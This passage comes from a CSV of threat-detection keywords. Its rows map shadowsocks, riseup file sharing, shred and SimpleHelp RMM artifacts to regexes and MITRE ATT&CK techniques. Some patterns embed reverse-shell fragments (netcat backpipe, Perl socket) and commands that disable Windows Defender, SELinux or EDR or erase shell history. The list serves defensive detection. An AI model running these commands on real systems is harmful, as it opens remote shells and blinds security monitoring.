TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","1","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*SHADOWSOCKS_CONFIG_PATH*",".{0,1000}SHADOWSOCKS_CONFIG_PATH.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*SHADOWSOCKS6_CONFIG_PATH*",".{0,1000}SHADOWSOCKS6_CONFIG_PATH.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*shadowsocks-local-service*",".{0,1000}shadowsocks\-local\-service.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","Servicename","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*shadowsocks-rust-local@*",".{0,1000}shadowsocks\-rust\-local\@.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*shadowsocks-rust-server@*",".{0,1000}shadowsocks\-rust\-server\@.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*snap.shadowsocks-rust.sslocal-daemon.service*",".{0,1000}snap\.shadowsocks\-rust\.sslocal\-daemon\.service.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*ss_privoxy.exe*",".{0,1000}ss_privoxy\.exe.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","1","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*https://share.riseup.net/2*",".{0,1000}https\:\/\/share\.riseup\.net\/2.{0,1000}","greyware_tool_keyword","share.riseup.net","temporary file hosting service - abused by attackers to share information with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Collection","https://share.riseup.net","1","1","N/A","downloading files url","10","10","N/A","N/A","N/A","N/A" "*https://share.riseup.net/up*",".{0,1000}https\:\/\/share\.riseup\.net\/up.{0,1000}","greyware_tool_keyword","share.riseup.net","temporary file hosting service - abused by attackers to share information with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Data Exfiltration","https://share.riseup.net","1","1","N/A","uploading files url","10","10","N/A","N/A","N/A","N/A" "*/bin/sh | nc*",".{0,1000}\/bin\/sh\s\|\snc.{0,1000}","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - 
TA0008","N/A","N/A","C2","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z" "*/bin/sh -i <&3 >&3 2>&3*",".{0,1000}\/bin\/sh\s\-i\s\<\&3\s\>\&3\s2\>\&3.{0,1000}","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z" "*rm -f backpipe* mknod /tmp/backpipe p && nc *",".{0,1000}rm\s\-f\sbackpipe.{0,1000}\smknod\s\/tmp\/backpipe\sp\s\&\&\snc\s.{0,1000}","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z" "*sc config WinDefend start= disabled*",".{0,1000}sc\sconfig\sWinDefend\sstart\=\sdisabled.{0,1000}","greyware_tool_keyword","shell","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*schkconfig off cbdaemon*","schkconfig\soff\scbdaemon","greyware_tool_keyword","shell","Adversaries may disable security tools to avoid possible detection of their tools and activities. 
This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*service cbdaemon stop*","service\scbdaemon\sstop","greyware_tool_keyword","shell","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*socket(S*PF_INET*SOCK_STREAM*getprotobyname(*tcp*))*if(connect(S*sockaddr_in($p*inet_aton($i))))*",".{0,1000}socket\(S.{0,1000}PF_INET.{0,1000}SOCK_STREAM.{0,1000}getprotobyname\(.{0,1000}tcp.{0,1000}\)\).{0,1000}if\(connect\(S.{0,1000}sockaddr_in\(\$p.{0,1000}inet_aton\(\$i\)\)\)\).{0,1000}","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","1","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z" "*STDIN->fdopen($c*r)*$~->fdopen($c*w)*system$_ while<>*",".{0,1000}STDIN\-\>fdopen\(\$c.{0,1000}r\).{0,1000}\$\~\-\>fdopen\(\$c.{0,1000}w\).{0,1000}system\$_\swhile\<\>.{0,1000}","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - 
T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z" "*uname -a* w* id* /bin/bash -i*",".{0,1000}uname\s\-a.{0,1000}\sw.{0,1000}\sid.{0,1000}\s\/bin\/bash\s\-i.{0,1000}","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z" "setenforce 0","setenforce\s0","greyware_tool_keyword","shell","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*shred $HISTFILE*",".{0,1000}shred\s\$HISTFILE.{0,1000}","greyware_tool_keyword","shred","deleting bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*shred --remove*",".{0,1000}shred\s\-\-remove.{0,1000}","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. 
Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*shred -u*",".{0,1000}shred\s\-u.{0,1000}","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*shred -z*",".{0,1000}shred\s\-z.{0,1000}","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. 
Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*shred --zero*",".{0,1000}shred\s\-\-zero.{0,1000}","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*\file_shredder_setup.tmp*",".{0,1000}\\file_shredder_setup\.tmp.{0,1000}","greyware_tool_keyword","Shredder","File Shredder is FREE and powerfull aplication to shred and permanently remove unwanted files from your computer beyond recovery","T1070 - T1485 - T1565.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.fileshredder.org/","1","0","N/A","N/A","7","8","N/A","N/A","N/A","N/A" "*\Shredder.exe*",".{0,1000}\\Shredder\.exe.{0,1000}","greyware_tool_keyword","Shredder","File Shredder is FREE and powerfull aplication to shred and permanently remove unwanted files from your computer beyond recovery","T1070 - T1485 - T1565.001","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://www.fileshredder.org/","1","0","N/A","N/A","7","8","N/A","N/A","N/A","N/A" "*>File Shredder by PowTools<*",".{0,1000}\>File\sShredder\sby\sPowTools\<.{0,1000}","greyware_tool_keyword","Shredder","File Shredder is a FREE and powerful application to shred and permanently remove unwanted files from your computer beyond recovery","T1070 - T1485 - T1565.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.fileshredder.org/","1","0","N/A","N/A","7","8","N/A","N/A","N/A","N/A" "*File Shredder setup.exe*",".{0,1000}File\sShredder\ssetup\.exe.{0,1000}","greyware_tool_keyword","Shredder","File Shredder is a FREE and powerful application to shred and permanently remove unwanted files from your computer beyond recovery","T1070 - T1485 - T1565.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.fileshredder.org/","1","1","N/A","N/A","7","8","N/A","N/A","N/A","N/A" "*File Shredder.exe*",".{0,1000}File\sShredder\.exe.{0,1000}","greyware_tool_keyword","Shredder","File Shredder is a FREE and powerful application to shred and permanently remove unwanted files from your computer beyond recovery","T1070 - T1485 - T1565.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.fileshredder.org/","1","1","N/A","N/A","7","8","N/A","N/A","N/A","N/A" "*file_shredder_setup.exe*",".{0,1000}file_shredder_setup\.exe.{0,1000}","greyware_tool_keyword","Shredder","File Shredder is a FREE and powerful application to shred and permanently remove unwanted files from your computer beyond recovery","T1070 - T1485 - T1565.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.fileshredder.org/","1","1","N/A","N/A","7","8","N/A","N/A","N/A","N/A" "*Program Files\File Shredder\*",".{0,1000}Program\sFiles\\File\sShredder\\.{0,1000}","greyware_tool_keyword","Shredder","File Shredder is a FREE and powerful application to shred and permanently remove unwanted files from your computer beyond recovery","T1070 - T1485 - T1565.001","TA0005 - 
TA0040","N/A","N/A","Defense Evasion","https://www.fileshredder.org/","1","0","N/A","N/A","7","8","N/A","N/A","N/A","N/A" "*""SimpleHelp Remote Printer""*",".{0,1000}\""SimpleHelp\sRemote\sPrinter\"".{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/simplehelper64.exe*",".{0,1000}\/simplehelper64\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\JWrapper-SimpleHelp Remote Work*",".{0,1000}\\JWrapper\-SimpleHelp\sRemote\sWork.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\JWrapper-SimpleHelp Technician*",".{0,1000}\\JWrapper\-SimpleHelp\sTechnician.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\JWrapper-SimpleHelp Technician\*",".{0,1000}\\JWrapper\-SimpleHelp\sTechnician\\.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Programs\SimpleHelp 
Remote Work""*",".{0,1000}\\Programs\\SimpleHelp\sRemote\sWork\"".{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\Programs\SimpleHelp Technician*",".{0,1000}\\Programs\\SimpleHelp\sTechnician.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\remote access session.exe*",".{0,1000}\\remote\saccess\ssession\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\remote access.exe*",".{0,1000}\\remote\saccess\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Remote AccessEmbedExample.html*",".{0,1000}\\Remote\sAccessEmbedExample\.html.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Remote Access-java-online.jar*",".{0,1000}\\Remote\sAccess\-java\-online\.jar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has 
been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\remote support.exe*",".{0,1000}\\remote\ssupport\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Remote SupportEmbedExample.html*",".{0,1000}\\Remote\sSupportEmbedExample\.html.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\remoteaccess-jar-with-dependencies.jar*",".{0,1000}\\remoteaccess\-jar\-with\-dependencies\.jar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\SafeBoot\Network\ShTemporaryService*",".{0,1000}\\SafeBoot\\Network\\ShTemporaryService.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\SafeBoot\Network\SimpleHelp Server*",".{0,1000}\\SafeBoot\\Network\\SimpleHelp\sServer.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - 
TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\Services\SimpleHelp Server*",".{0,1000}\\Services\\SimpleHelp\sServer.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\simplegateway.service""*",".{0,1000}\\simplegateway\.service\"".{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\SimpleHelp TechnicianEmbedExample.html*",".{0,1000}\\SimpleHelp\sTechnicianEmbedExample\.html.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\SimpleHelp.RemoteWork.127_0_0_1*",".{0,1000}\\SimpleHelp\.RemoteWork\.127_0_0_1.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\SimpleHelp.Technician.127_0_0_1*",".{0,1000}\\SimpleHelp\.Technician\.127_0_0_1.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\simplehelper64.exe*",".{0,1000}\\simplehelper64\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\simplehelp-rw\shell*",".{0,1000}\\simplehelp\-rw\\shell.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\simplehelpuninstall.exe*",".{0,1000}\\simplehelpuninstall\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\SimpleService.exe*",".{0,1000}\\SimpleService\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\StopSimpleGatewayService.exe*",".{0,1000}\\StopSimpleGatewayService\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\winpty-agent64.exe*",".{0,1000}\\winpty\-agent64\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>SimpleHelp Ltd<*",".{0,1000}\>SimpleHelp\sLtd\<.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","#companyname","N/A","10","10","N/A","N/A","N/A","N/A" "*bin\Remote AccessLauncher.exe*",".{0,1000}bin\\Remote\sAccessLauncher\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Elevate*\elev_win.exe*",".{0,1000}Elevate.{0,1000}\\elev_win\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*firewall add rule ""name=SH Remote Access Service Launcher""*",".{0,1000}firewall\sadd\srule\s\""name\=SH\sRemote\sAccess\sService\sLauncher\"".{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*firewall add rule ""name=SH Remote Access Service 
Updater""*",".{0,1000}firewall\sadd\srule\s\""name\=SH\sRemote\sAccess\sService\sUpdater\"".{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*firewall add rule ""name=SH Remote Access Service""*",".{0,1000}firewall\sadd\srule\s\""name\=SH\sRemote\sAccess\sService\"".{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Manage Remote Access Service.exe*",".{0,1000}Manage\sRemote\sAccess\sService\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Program Files\SimpleHelp*",".{0,1000}Program\sFiles\\SimpleHelp.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ProgramData\JWrapper-Remote Access\*.exe*",".{0,1000}ProgramData\\JWrapper\-Remote\sAccess\\.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote 
AccessECompatibility.exe*",".{0,1000}Remote\sAccessECompatibility\.exe.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Access-linux32arm-offline.tar*",".{0,1000}Remote\sAccess\-linux32arm\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Access-linux32arm-online.tar*",".{0,1000}Remote\sAccess\-linux32arm\-online\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackCat","RMM","simple-help.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Access-linux32-offline.tar*",".{0,1000}Remote\sAccess\-linux32\-offline\.tar.{0,1000}","greyware_tool_keyword","SimpleHelp","SimpleHelp is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - 